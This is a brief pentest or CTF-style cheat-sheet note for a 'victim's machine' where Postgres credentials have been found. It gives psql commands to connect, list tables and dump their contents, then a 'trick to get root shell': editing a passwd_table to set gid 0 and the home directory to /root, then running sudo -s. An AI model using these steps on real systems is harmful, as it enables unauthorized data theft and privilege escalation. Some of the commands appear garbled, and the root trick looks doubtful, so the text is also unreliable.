Postgress creds found?

https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546

On the victim's machine, run

psql -d unix(database-name) UserNAME -h localhost

Run,\dt to show tables.

run

:select * from table_name;

---

Trick to get root shell:

update passwd_table set gid=0 where gid=1000;

update passwd_table set homedir='/root' where homedir='/var/jail/home';

Then run sudo -s to impersonate as a root account

cat /etc/group | grep sudo to verify the gid!

Last updated